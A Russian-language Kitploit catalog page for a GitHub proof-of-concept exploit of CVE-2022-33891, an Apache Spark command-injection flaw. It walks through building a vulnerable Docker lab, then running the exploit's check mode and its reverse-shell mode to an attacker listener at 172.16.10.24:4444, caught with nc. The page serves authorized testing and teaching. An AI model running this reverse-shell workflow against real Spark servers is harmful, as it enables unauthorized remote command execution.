Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/asepsaepdin/cve-2022-33891
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеОбучение и Образование
GitHubasepsaepdin/cve-2022-33891

CVE-2022-33891

Эксплойт для проверки концепции инъекции команд в Apache Spark (CVE-2022-33891) с режимами проверки и обратной оболочки, позволяющий проводить авторизованное тестирование безопасности.

Репозиторий
21 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-33891 - Уязвимость внедрения команд в Apache Spark

Python


⚠️ Только для образовательных и авторизованных целей безопасности

Авторы оригинального эксплойта

Огромная благодарность автору оригинального PoC AkbarTrilaksana

Описание

Пользовательский интерфейс Apache Spark позволяет включить ACL через параметр конфигурации spark.acls.enable. При использовании фильтра аутентификации проверяется, имеет ли пользователь права доступа для просмотра или изменения приложения. Если ACL включены, код в HttpSecurityFilter может позволить злоумышленнику выполнить подмену, указав произвольное имя пользователя. Затем злоумышленник может вызвать функцию проверки разрешений, которая в конечном итоге сформирует и выполнит команду оболочки Unix на основе его ввода. Это приводит к выполнению произвольных команд оболочки от имени пользователя, под которым запущен Spark. Уязвимость затрагивает Apache Spark версий 3.0.3 и ранее, версии 3.1.1–3.1.2, а также версии 3.2.0–3.2.1.


Пошаговое руководство

  1. Сначала клонируйте репозиторий

    root@kitploit:~
    git clone https://github.com/asepsaepdin/CVE-2022-33891.git
    
  2. Перейдите в каталог

    root@kitploit:~
    cd CVE-2022-33891
    
  3. Установите зависимости:

    root@kitploit:~
    pip3 install -r requirements.txt --break-system-packages
    
  4. Запустите контейнер

    root@kitploit:~
    docker compose up
    
  5. В новом терминале выполните команду

    root@kitploit:~
    docker exec -it CVE-2022-33891-spark-1 /bin/bash
    
  6. В сессии bash внутри контейнера введите:

    root@kitploit:~
    echo "spark.acls.enable       true" >> conf/spark-defaults.conf
    
  7. При необходимости проверьте содержимое spark-defaults.conf с помощью cat.

  8. Выйдите из интерактивной оболочки bash и остановите docker-compose с помощью Ctrl+C.

  9. После корректного завершения контейнеров снова запустите docker-compose up

    root@kitploit:~
    docker compose up
    
  10. Проверьте, уязвима ли цель:

    root@kitploit:~
    python3 poc.py -u http://localhost -p 8080 --check
    
  11. С точки зрения атакующего, удаленное выполнение кода критично для получения интерактивной оболочки. Поэтому выполнение следующей команды запустит реверс-шелл telnet на базе bash на систему атакующего через TCP на порт 4444:

    root@kitploit:~
    python3 poc.py -u http://localhost -p 8080 --revshell -lh 172.16.10.24 -lp 4444
    
    root@kitploit:~
    nc -nlvp 4444
    

Источники

  • https://github.com/AkbarTrilaksana/cve-2022-33891
  • https://nvd.nist.gov/vuln/detail/cve-2022-33891
Скачать инструмент